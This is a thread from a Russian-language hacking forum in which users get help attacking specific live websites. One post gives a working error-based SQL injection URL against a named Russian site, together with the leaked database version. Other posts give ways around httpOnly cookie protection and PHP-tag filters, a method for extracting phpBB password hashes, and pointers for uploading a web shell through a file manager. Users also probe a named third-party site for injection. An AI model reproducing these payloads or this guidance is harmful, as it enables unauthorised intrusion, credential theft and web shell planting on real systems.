Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    137
    Likes Received:
    43
    Reputations:
    26
    2aydin-ka
     
    1 person likes this.
  2. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    httpOnly запрещает чтение Cookie через JS.
     
  3. jasp3r

    jasp3r New Member

    Joined:
    23 Apr 2012
    Messages:
    44
    Likes Received:
    4
    Reputations:
    0
    Спасибо, а есть возможность обойти это?
     
  4. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    XSS выполняется на стороне клиента. Выполнить код на сервере непосредственно через эту уязвимость нельзя.
     
  5. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    1) Метод TRACE
    2) Уязвимость веб-сервера
    http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0053
    3) Плагины браузера
    http://seckb.yehg.net/2012/06/xss-gaining-access-to-httponly-cookie.html
     
  6. jasp3r

    jasp3r New Member

    Joined:
    23 Apr 2012
    Messages:
    44
    Likes Received:
    4
    Reputations:
    0
    Буду пробовать.
    Еще в этом phpbb нашел такую штуку, в настройках юзера, там где формат даты вручную можно вводить, ввожу "><script></script> - выдает ошибку mysql:

    SQL ERROR [ mysql4 ]
    Data too long for column 'user_dateformat' at row 1 [1406]

    при этом дата на форуме выглядит теперь вот так
    [​IMG]

    Можно ли раскрутить до уязвимости?

    Стоит там еще ajax chat у них, файл install не удалили, но максимум что с его помощью можно сделать, это выкинуть всех из чата, может я что-то еще не попробовал? Подсобите :)
     
    #20786 jasp3r, 16 Jul 2012
    Last edited: 16 Jul 2012
  7. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Code:
    http://tonkiimir.ru/reputation.php?u=3+or(1)group+by(concat(version(),0x00,floor(rand(0)*2)))having(min(0)or(1))--+
    Duplicate entry '5.1.58-1ubuntu1-log' for key 'group_key' [1062]
     
    _________________________
    1 person likes this.
  8. HeBepHyCb

    HeBepHyCb New Member

    Joined:
    12 Jul 2008
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Ок, тогда не подскажете, как обойти фильтрацию такого рода:
    Пишу <? phpinfo() ?> сохраняется как <!--? phpinfo() ?-->
    Если пишу &lt;? phpinfo() ?&gt; то сохраняется в исходном коде точно так же, а выводится на странице нормально т.е. <? phpinfo() ?>, но не исполняется (( Как же тогда его туды вставить ?
     
  9. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    1. Выключена обработка РНР в файлах где Вы пытаетесь его вставить.
    2. short_open_tag = off
    3. Попробуйте варианты {php}{/php}, <!-- PHP --><!-- ENDPHP --> ну и тому подобные, в некоторых шаблонах проходят такие варианты кода! Да и убедитесь, что тот кусок куда Вы вставляете код, не выводится системой через echo... Боюсь потому у вас и идет вывод на страницу кода РНР!
    P.S. Вариантов куда больше, думайте не много и сами...
     
  10. jasp3r

    jasp3r New Member

    Joined:
    23 Apr 2012
    Messages:
    44
    Likes Received:
    4
    Reputations:
    0
    в phpbb3 хэш 34 символа(вместе с $H$) в моем случае вывод максимум 31 символ
    можно ли как-то сделать, чтобы выводило после 3го символа, т.е. без $H$ ?
     
  11. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    http://www.mysql.ru/docs/man/String_functions.html#MID
     
    _________________________
  12. jasp3r

    jasp3r New Member

    Joined:
    23 Apr 2012
    Messages:
    44
    Likes Received:
    4
    Reputations:
    0
    все получилось, спасибо ;)
     
  13. skier529

    skier529 New Member

    Joined:
    8 May 2009
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    Ребятки, прошу, помгите плиз.
    Нужно залить шелл через Ajex.FileManager v1.0
    + В админке есть следующий текстовый редактор CKEditor 3.6.3 (revision 7474).
    Если кто-то знает как залить прошу откликнуться.
     
    #20793 skier529, 17 Jul 2012
    Last edited: 18 Jul 2012
  14. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    http://www.exploit-db.com/exploits/17644/
     
  15. skier529

    skier529 New Member

    Joined:
    8 May 2009
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    К сожалению, тут попались админы-параноики.
    Таких путей нет и в помине:
    Code:
    http://target.com/FCKeditor/editor/filemanager/upload/test.html
    http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html
     
  16. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    917
    Likes Received:
    492
    Reputations:
    724
    Если WP, то что мешает скачать плагин и посмотреть начинку, например:
     
    _________________________
  17. eclipse92

    eclipse92 Banned

    Joined:
    17 Jan 2011
    Messages:
    0
    Likes Received:
    2
    Reputations:
    -11
    Нашёл ошибку http://www.european-athletics.org/favicon.ico/.php
    можно ли раскрутить, если это скуля или другие варианты
     
  18. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    Это не инъекция
     
  19. eclipse92

    eclipse92 Banned

    Joined:
    17 Jan 2011
    Messages:
    0
    Likes Received:
    2
    Reputations:
    -11
    а что тогда?
     
  20. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Не более чем раскрытие путей. Баги с NGinx На этом серваке нет.
     
    _________________________
Thread Status:
Not open for further replies.